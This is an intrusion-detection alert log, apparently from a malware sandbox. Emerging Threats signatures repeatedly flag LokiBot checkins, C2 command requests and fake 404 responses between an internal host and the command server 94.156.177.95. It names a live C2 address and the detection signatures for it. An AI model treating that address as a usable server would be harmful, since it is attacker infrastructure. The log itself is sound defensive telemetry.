2024-11-15T18:14:49.701579+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:49.701579+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:49.707074+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49845	TCP
2024-11-15T18:14:49.866643+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:49.866643+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:49.866643+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:50.823890+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:50.823890+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:50.829216+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49851	TCP
2024-11-15T18:14:51.015684+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:51.015684+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:51.015684+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:51.959024+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:51.959024+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:51.964278+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49856	TCP
2024-11-15T18:14:52.116189+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:52.116189+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:52.116189+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:53.063828+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:53.063828+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:53.069205+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49862	TCP
2024-11-15T18:14:53.231994+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:53.231994+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:53.231994+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:54.208036+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:54.208036+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:54.213464+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49869	TCP
2024-11-15T18:14:54.415833+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:54.415833+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:54.415833+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:55.402259+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:55.402259+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:55.434663+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49875	TCP
2024-11-15T18:14:55.567481+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:55.567481+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:55.567481+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:56.541320+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:56.541320+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:56.546595+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49880	TCP
2024-11-15T18:14:56.697888+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:56.697888+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:56.697888+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:57.675629+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:57.675629+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:57.681469+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49885	TCP
2024-11-15T18:14:57.888076+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:57.888076+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:57.888076+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:59.316568+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:59.316568+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:59.322192+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49889	TCP
2024-11-15T18:14:59.477956+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:14:59.477956+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:14:59.477956+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:00.437229+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:00.437229+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:00.442485+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49897	TCP
2024-11-15T18:15:00.622720+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:00.622720+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:00.622720+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:01.556689+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:01.556689+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:01.562051+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49901	TCP
2024-11-15T18:15:01.716470+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:01.716470+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:01.716470+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:02.676612+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:02.676612+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:02.681975+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49905	TCP
2024-11-15T18:15:02.843351+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:02.843351+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:02.843351+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:03.787032+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:03.787032+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:03.792789+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49909	TCP
2024-11-15T18:15:03.944044+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:03.944044+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:03.944044+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:04.910372+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:04.910372+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:04.915936+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49915	TCP
2024-11-15T18:15:05.079130+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:05.079130+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:05.079130+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:06.064903+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:06.064903+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:06.070494+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49920	TCP
2024-11-15T18:15:06.232263+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:06.232263+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:06.232263+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:07.206218+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:07.206218+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:07.212159+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49925	TCP
2024-11-15T18:15:07.371818+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:07.371818+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:07.371818+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:08.362963+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:08.362963+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:08.368386+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49931	TCP
2024-11-15T18:15:08.527825+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:08.527825+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:08.527825+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:09.478766+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:09.478766+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:09.483923+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49935	TCP
2024-11-15T18:15:09.646081+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:09.646081+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:09.646081+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:10.588289+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:10.588289+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:10.593620+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49941	TCP
2024-11-15T18:15:10.738508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:10.738508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:10.738508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:11.699501+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:11.699501+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:11.704837+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49947	TCP
2024-11-15T18:15:11.909051+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:11.909051+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:11.909051+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:12.850507+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:12.850507+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:12.856000+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49952	TCP
2024-11-15T18:15:13.033207+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:13.033207+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:13.033207+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:13.986959+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:13.986959+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:13.992144+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49959	TCP
2024-11-15T18:15:14.143909+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:14.143909+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:14.143909+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:15.095886+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:15.095886+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:15.100964+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49965	TCP
2024-11-15T18:15:15.260992+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:15.260992+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:15.260992+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:16.190598+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:16.190598+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:16.196125+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49971	TCP
2024-11-15T18:15:16.354360+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:16.354360+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:16.354360+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:17.330232+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:17.330232+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:17.335539+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49976	TCP
2024-11-15T18:15:17.488009+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:17.488009+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:17.488009+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:18.444210+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:18.444210+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:18.454312+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49984	TCP
2024-11-15T18:15:18.648637+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:18.648637+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:18.648637+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:19.618198+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:19.618198+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:19.624026+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49991	TCP
2024-11-15T18:15:19.770914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:19.770914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:19.770914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:20.778565+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:20.778565+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:20.784082+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	49999	TCP
2024-11-15T18:15:21.183194+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:21.183194+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:21.183194+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:22.095646+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:22.095646+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:22.101011+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50006	TCP
2024-11-15T18:15:22.276771+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:22.276771+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:22.276771+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:23.204415+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:23.204415+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:23.210169+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50014	TCP
2024-11-15T18:15:23.386905+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:23.386905+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:23.386905+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:24.317698+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:24.317698+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:24.323159+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50022	TCP
2024-11-15T18:15:24.486068+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:24.486068+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:24.486068+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:26.042078+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:26.042078+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:26.047516+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50023	TCP
2024-11-15T18:15:26.198172+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:26.198172+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:26.198172+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:27.521568+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:27.521568+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:27.526873+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50024	TCP
2024-11-15T18:15:27.680897+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:27.680897+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:27.680897+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:28.641531+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:28.641531+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:28.646915+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.95	80	192.168.2.5	50025	TCP
2024-11-15T18:15:28.793698+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:28.793698+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50026	94.156.177.95	80	TCP
